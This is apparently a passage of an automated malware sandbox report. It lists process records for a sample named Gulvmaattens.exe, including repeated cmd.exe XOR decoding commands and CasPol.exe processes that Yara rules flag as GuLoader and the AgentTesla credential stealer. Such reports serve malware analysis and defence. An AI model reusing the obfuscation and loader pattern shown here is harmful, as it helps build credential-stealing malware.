                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:87
                          Start time:20:25:54
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:88
                          Start time:20:25:55
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:89
                          Start time:20:25:55
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x5A^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:90
                          Start time:20:25:55
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:91
                          Start time:20:25:55
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:92
                          Start time:20:25:55
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:93
                          Start time:20:25:55
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:94
                          Start time:20:25:55
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:95
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x1F^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:96
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:97
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:98
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:99
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x43^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:100
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:101
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:102
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:103
                          Start time:20:25:56
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:104
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:105
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x1F^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:106
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:107
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:108
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:109
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x5A^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:110
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:111
                          Start time:20:25:57
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:112
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:113
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x07^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:114
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:115
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x1F^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:116
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:117
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:118
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:119
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x5A^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:120
                          Start time:20:25:58
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:121
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:122
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:123
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:124
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:125
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x4B^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:126
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:127
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x0B^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:128
                          Start time:20:25:59
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:129
                          Start time:20:26:00
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:130
                          Start time:20:26:00
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:139
                          Start time:20:26:41
                          Start date:08/08/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\Gulvmaattens.exe"
                          Imagebase:0x3d0000
                          File size:108664 bytes
                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:140
                          Start time:20:26:41
                          Start date:08/08/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\Gulvmaattens.exe"
                          Imagebase:0x190000
                          File size:108664 bytes
                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:141
                          Start time:20:26:41
                          Start date:08/08/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\Gulvmaattens.exe"
                          Imagebase:0x160000
                          File size:108664 bytes
                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:142
                          Start time:20:26:42
                          Start date:08/08/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\Gulvmaattens.exe"
                          Imagebase:0x3b0000
                          File size:108664 bytes
                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:143
                          Start time:20:26:42
                          Start date:08/08/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Gulvmaattens.exe"
                          Imagebase:0x670000
                          File size:108664 bytes
                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000008F.00000000.51450296776.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                          Target ID:144
                          Start time:20:26:42
                          Start date:08/08/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff783170000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          No disassembly